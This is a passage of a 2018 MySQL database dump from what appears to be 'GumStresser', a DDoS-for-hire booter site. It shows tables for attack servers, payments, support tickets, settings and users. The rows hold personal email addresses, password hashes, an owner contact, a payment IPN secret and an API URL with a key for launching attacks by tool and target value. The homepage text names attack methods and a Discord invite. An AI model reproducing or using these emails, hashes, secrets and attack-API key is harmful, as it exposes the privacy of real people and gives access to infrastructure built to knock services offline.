261 `tid` varchar(30) NOT NULL,
262 `date` int(255) NOT NULL,
263 PRIMARY KEY (`ID`)
264) ENGINE=MyISAM DEFAULT CHARSET=latin1;
265/*!40101 SET character_set_client = @saved_cs_client */;
266
267--
268-- Dumping data for table `pp_payments`
269--
270
271LOCK TABLES `pp_payments` WRITE;
272/*!40000 ALTER TABLE `pp_payments` DISABLE KEYS */;
273/*!40000 ALTER TABLE `pp_payments` ENABLE KEYS */;
274UNLOCK TABLES;
275
276--
277-- Table structure for table `servers`
278--
279
280DROP TABLE IF EXISTS `servers`;
281/*!40101 SET @saved_cs_client = @@character_set_client */;
282/*!40101 SET character_set_client = utf8 */;
283CREATE TABLE `servers` (
284 `id` int(11) NOT NULL AUTO_INCREMENT,
285 `host` varchar(50) NOT NULL,
286 `username` varchar(128) NOT NULL,
287 `password` varchar(255) NOT NULL,
288 `methods` varchar(255) NOT NULL,
289 `response` varchar(20) NOT NULL,
290 PRIMARY KEY (`id`)
291) ENGINE=InnoDB DEFAULT CHARSET=latin1;
292/*!40101 SET character_set_client = @saved_cs_client */;
293
294--
295-- Dumping data for table `servers`
296--
297
298LOCK TABLES `servers` WRITE;
299/*!40000 ALTER TABLE `servers` DISABLE KEYS */;
300/*!40000 ALTER TABLE `servers` ENABLE KEYS */;
301UNLOCK TABLES;
302
303--
304-- Table structure for table `settings`
305--
306
307DROP TABLE IF EXISTS `settings`;
308/*!40101 SET @saved_cs_client = @@character_set_client */;
309/*!40101 SET character_set_client = utf8 */;
310CREATE TABLE `settings` (
311 `id` int(11) NOT NULL AUTO_INCREMENT,
312 `siteurl` varchar(200) NOT NULL,
313 `sitetitle` varchar(200) NOT NULL,
314 `sitemail` varchar(200) NOT NULL,
315 `contact` varchar(200) NOT NULL,
316 `paypal` varchar(200) NOT NULL,
317 `btc` varchar(255) NOT NULL,
318 `skypeapi` varchar(255) NOT NULL,
319 `trialseconds` int(11) NOT NULL,
320 `custompackages` int(1) NOT NULL,
321 `custompbase` int(11) NOT NULL,
322 `mailingtype` varchar(30) NOT NULL,
323 `smtphost` varchar(200) NOT NULL,
324 `smtpuser` varchar(200) NOT NULL,
325 `smtppass` varchar(200) NOT NULL,
326 `smtpport` int(11) NOT NULL,
327 `homepage` longtext NOT NULL,
328 `tos` longtext NOT NULL,
329 `cpmerchant` varchar(100) NOT NULL,
330 `cpipnsecret` varchar(100) NOT NULL,
331 PRIMARY KEY (`id`)
332) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
333/*!40101 SET character_set_client = @saved_cs_client */;
334
335--
336-- Dumping data for table `settings`
337--
338
339LOCK TABLES `settings` WRITE;
340/*!40000 ALTER TABLE `settings` DISABLE KEYS */;
341INSERT INTO `settings` VALUES (1,'https://gumstresser.us','GumStresser','mrsasa971@gmail.com','mrsasa971@gmail.com','mrsasa971@gmail.com','','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=[tool]&value=[value]',30,0,5,'php','','','',0,'<h1><strong>Bienvenue sur GumStresser</strong></h1>\r\n\r\n<p><strong>Voici le nouveau discord le discord c'est fait ban a cause d'un mec qui a report :/ </strong>https://discord.gg/sxz5mK7</p>\r\n\r\n<h2 style=\"font-style:italic\"><strong>Nouvellle source pour avoir vos plans merci de bien vouloir contacté par live chat ou discord avec le plans que vous aviez :D</strong></h2>\r\n\r\n<p> </p>\r\n\r\n<p>LES METHOD HAVEN ET UDPLAG SONT TEMPORAIREMENT INDISPONIBLE</p>\r\n','','01925dd3e709895e40fcf4641fbc687b','');
342/*!40000 ALTER TABLE `settings` ENABLE KEYS */;
343UNLOCK TABLES;
344
345--
346-- Table structure for table `ticketreplies`
347--
348
349DROP TABLE IF EXISTS `ticketreplies`;
350/*!40101 SET @saved_cs_client = @@character_set_client */;
351/*!40101 SET character_set_client = utf8 */;
352CREATE TABLE `ticketreplies` (
353 `id` int(11) NOT NULL AUTO_INCREMENT,
354 `tid` int(11) NOT NULL,
355 `author` int(1) NOT NULL,
356 `reply` text NOT NULL,
357 `date` int(11) NOT NULL,
358 PRIMARY KEY (`id`)
359) ENGINE=InnoDB DEFAULT CHARSET=latin1;
360/*!40101 SET character_set_client = @saved_cs_client */;
361
362--
363-- Dumping data for table `ticketreplies`
364--
365
366LOCK TABLES `ticketreplies` WRITE;
367/*!40000 ALTER TABLE `ticketreplies` DISABLE KEYS */;
368/*!40000 ALTER TABLE `ticketreplies` ENABLE KEYS */;
369UNLOCK TABLES;
370
371--
372-- Table structure for table `tickets`
373--
374
375DROP TABLE IF EXISTS `tickets`;
376/*!40101 SET @saved_cs_client = @@character_set_client */;
377/*!40101 SET character_set_client = utf8 */;
378CREATE TABLE `tickets` (
379 `id` int(11) NOT NULL AUTO_INCREMENT,
380 `department` varchar(20) NOT NULL,
381 `senderid` int(1) NOT NULL,
382 `title` varchar(35) NOT NULL,
383 `details` varchar(255) NOT NULL,
384 `date` int(11) NOT NULL,
385 `status` int(1) NOT NULL,
386 PRIMARY KEY (`id`)
387) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;
388/*!40101 SET character_set_client = @saved_cs_client */;
389
390--
391-- Dumping data for table `tickets`
392--
393
394LOCK TABLES `tickets` WRITE;
395/*!40000 ALTER TABLE `tickets` DISABLE KEYS */;
396INSERT INTO `tickets` VALUES (1,'General Inquire',1,'Test Ticket','Ticket information here.',1429835212,2),(2,'Sales',12,'Grade','J'avais le grade parmecia',1533703013,1);
397/*!40000 ALTER TABLE `tickets` ENABLE KEYS */;
398UNLOCK TABLES;
399
400--
401-- Table structure for table `users`
402--
403
404DROP TABLE IF EXISTS `users`;
405/*!40101 SET @saved_cs_client = @@character_set_client */;
406/*!40101 SET character_set_client = utf8 */;
407CREATE TABLE `users` (
408 `ID` int(11) NOT NULL AUTO_INCREMENT,
409 `username` varchar(15) NOT NULL,
410 `password` varchar(128) NOT NULL,
411 `email` varchar(50) NOT NULL,
412 `rank` int(11) NOT NULL DEFAULT '0',
413 `package` int(11) NOT NULL,
414 `maxboot` int(11) NOT NULL,
415 `expire` int(11) NOT NULL,
416 `status` varchar(1000) CHARACTER SET latin1 COLLATE latin1_spanish_ci NOT NULL,
417 PRIMARY KEY (`ID`),
418 KEY `ID` (`ID`)
419) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=latin1;
420/*!40101 SET character_set_client = @saved_cs_client */;
421
422--
423-- Dumping data for table `users`
424--
425
426LOCK TABLES `users` WRITE;
427/*!40000 ALTER TABLE `users` DISABLE KEYS */;
428INSERT INTO `users` VALUES (4,'AyatoKun666','906ccaf87c48a45956a81d26935accc4bf1837785ae5fea7905c902cee01c41a80c57a7b9f72c555bf6bb65e8c3b9951899834654a15d315702cd91e16167638','masterhack468@gmail.com',1,0,0,0,'0'),(5,'kuky14lf','371c5e06e95e0fa8efd6b7e8616d8ab8e5138d2e141201aca84c69a620b93420a5dfee96fb12e36162e1cc6be3bf2a9067fb548200d6828c3ff265b2b8ca0c8d','eloya26@hotmail.com',0,5,3500,1536337009,'0'),(3,'sasa971','03afbc5457b5829fafd70a05f98807488a06cd8228098fbd1d903bc49fdf4ca4532cc59ae005dc332a5e9399c550f3f6c308a18b5a5b42f71f1842941e47a93a','mrsasa971@gmail.com',1,6,2147483647,2147483647,'0'),(6,'Achlyys','9a964d8a6a16a28b82804fd7a85f140c68dcd7e3cb33c93444d59b903319dfad50b37d887de410b7759ba53f0b608331e4440ec24de39ce86cd15f492b800c6b','imhereforyouleseulestlunique@gmail.com',0,4,2300,1565195621,'0'),(7,'Narkos','adc58d28193b4b9a8df975d8e7da47d53932a8b9f6afb0ceb5629e82c1cc4bc106980651d0ac791c86d713e4020cc2c92937820e22ace2b13570beefc74c12d3','Narkos.priv@gmail.com',0,0,0,0,'0'),(8,'K1NGARU','50b74da97bf48095972ae2a63c40c06ed6255288bee5279db23b5a3043d472c3778f0f38f448eaefdf4fe4ad17ec66791857c9cc92ebbaca89c98929eb852c20','kingaruud@gmail.com',0,2,300,1536345716,'0'),(9,'mario2015','03afbc5457b5829fafd70a05f98807488a06cd8228098fbd1d903bc49fdf4ca4532cc59ae005dc332a5e9399c550f3f6c308a18b5a5b42f71f1842941e47a93a','mrsasa971@gmail.com',0,0,0,0,'0'),(10,'fuckcmm','81e1a5d8e2f7e2dfa011bb80813de26fc731eaf897476c692a8469a99e5b0b608a704eb4a5a2f037a87716293f755e49b5f530218892d1c379aa4b9f35854bb3','coni@twocowmail.net',0,0,0,0,'0'),(11,'KaioKen','61f287dac922ab054738c386d324ca6f82df07309cf6dbb8686aa9a4ffa7e7a471c79bf78f9f920df57677c003cb532a1ce4525e2db64a5769fc82b8ebdfd2a9','kanomail@protonmail.com',0,0,0,0,'0'),(12,'LaStTruite','44f7c7864fd80254583f94ab6e47410acbdbc482335eed500dee6e930e2f1df8a6ccd1cf4d6c0ec4a5ce4226480c49c5ee35e6b1dadedd3a657143e262ef447d','you@are.fucked',0,0,0,0,'0'),(13,'Karma','f8ce3f4d09197c4645e9b475499e5d5d6f778c61e030ef043b299ee99ffb5c171a314955336318b22a9b0c3f188430427d05eb38750900a40e09337df54c3397','Karma0101@yahoo.com',0,0,0,0,'0'),(14,'Blinderrr','54df381c0a7beda3d8ff6b3e28a1bc0f0ffe5baba3c272ebc410946d631d7c1610dd2176a86a71bf3973e63218d289af810e4c8839e26b669d4bb165a6e821f2','BLINDER.REGEDIT@gmail.com',0,2,300,1536427483,'0'),(15,'Cappy','19a12478be5c1df7e3721dfbf3db51340535a1cf6845b0d9f6e9ae927184e54881bf4cfffb5920856e3c111cf0e8bdc9a34172e64f2ac76c50bd7f9de05aacdb','cappy.adocity@gmail.com',0,0,0,0,'0'),(16,'unknown','702ba833b088b150c02c773ad9a73ccfe0a8a9532e538d7253272f892d8458627c2cde43fe63e510ff2065c33408a58edef9c6d63fc5400bef39741e5af16536','audrey.sorel123@gmail.com',0,0,0,0,'0'),(17,'PerquiZ','e70326ec97963f27e629a4078d82e153833bd83dbe66528d7cd1fc9861c7e41a2f0d25cef06587414e6f75f44d4e5685d0b105802de70dca4f473a67dcb5e9fa','themrs9428@gmail.com',0,2,300,1536530631,'0');
429/*!40000 ALTER TABLE `users` ENABLE KEYS */;
430UNLOCK TABLES;
431/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
432
433/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
434/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
435/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
436/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
437/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
438/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
439/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
440
441-- Dump completed on 2018-08-10 16:46:04